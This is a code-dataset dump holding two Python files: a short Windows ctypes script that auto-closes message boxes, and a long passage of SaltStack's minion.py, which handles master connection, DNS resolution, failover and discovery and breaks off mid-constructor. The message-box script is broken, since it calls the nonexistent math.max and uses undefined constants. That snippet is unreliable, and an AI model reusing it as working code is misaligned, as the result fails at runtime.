source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
testAutoCloseWindow.py
|
import threading, time, ctypes, ctypes.wintypes, math
WM_CLOSE = 0x0010
MB_OK = 0
# def worker(title,close_until_seconds):
# time.sleep(close_until_seconds)
# wd=ctypes.windll.user32.FindWindowA(0,title)
# ctypes.windll.user32.SendMessageA(wd,0x0010,0,0)
# return
def find_messagebox(title, threadid, processid):
hwnd = ctypes.windll.user32.FindWindowA(None, title)
if hwnd:
p = ctypes.wintypes.DWORD()
t = ctypes.windll.user32.GetWindowThreadProcessId(hwnd, ctypes.byref(p))
if p.value == processid and t == threadid:
return hwnd
return 0
#danilo callback return True to run again False to stop
def callbackHandler(abort, threadid, processid, title, callbackDelay, callbackFn):
# give windows some time to create the message box
time.sleep(math.max(callbackDelay, 0.2))
while not abort.isSet() and callbackFn():
time.sleep(callbackDelay)
hwnd = find_messagebox(title, threadid, processid)
if not abort.isSet() and hwnd:
ctypes.windll.user32.PostMessageA(hwnd, WM_CLOSE, 0, 0)
def showWithCallback(text, title, callbackDelay, callbackFn):
threadid = ctypes.windll.kernel32.GetCurrentThreadId()
processid = ctypes.windll.kernel32.GetCurrentProcessId()
abort = threading.Event()
t = threading.Thread(target=callbackHandler, args=(abort, threadid, processid, title, callbackDelay, callbackFn))
t.start()
ctypes.windll.user32.MessageBoxW(0, text, title, MB_HELP | MB_YESNO | ICON_STOP)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import re
import sys
import copy
import time
import types
import signal
import random
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'])
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
def prep_ip_port(opts):
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']):
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(':', 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: [::1]:1234
# Strip off brackets for ipv6 support
ret['master'] = ip_port[0].strip('[]')
# Cast port back to an int! Otherwise a TypeError is thrown
# on some of the socket calls elsewhere in the minion and utils code.
ret['master_port'] = int(ip_port[1])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then its a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters.
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'{0}\'.'.format(opts['master'][0]))
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
log.warning(
'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
'of \'random_master\'. Please update your minion config file.'
)
opts['random_master'] = opts['master_shuffle']
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
last_exc = None
opts['master_uri_list'] = []
opts['local_masters'] = copy.copy(opts['master'])
# shuffle the masters and then loop through them
if opts['random_master']:
# master_failback is only used when master_type is set to failover
if opts['master_type'] == 'failover' and opts['master_failback']:
secondary_masters = opts['local_masters'][1:]
shuffle(secondary_masters)
opts['local_masters'][1:] = secondary_masters
else:
shuffle(opts['local_masters'])
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
if exc.strerror.startswith('Could not access'):
msg = (
'Failed to initiate connection with Master '
'%s: check ownership/permissions. Error '
'message: %s', opts['master'], exc
)
else:
msg = ('Master %s could not be reached, trying next '
'next master (if any)', opts['master'])
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Attempting {0} time{1} to discover masters'.format(att, (att > 1 and 's' or '')))
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: {0}'.format(err))
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "{0}". '
'Should be "any" or "all"'.format(policy))
else:
mapping = self.opts['discovery'].get('mapping', {})
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if policy == 'any' and bool(cnt) or cnt == len(mapping):
self.opts['master'] = proto_data['master']
return
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
# future lint: disable=str-format-in-logging
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
# future lint: enable=str-format-in-logging
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = [] if jid_queue is None else jid_queue
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
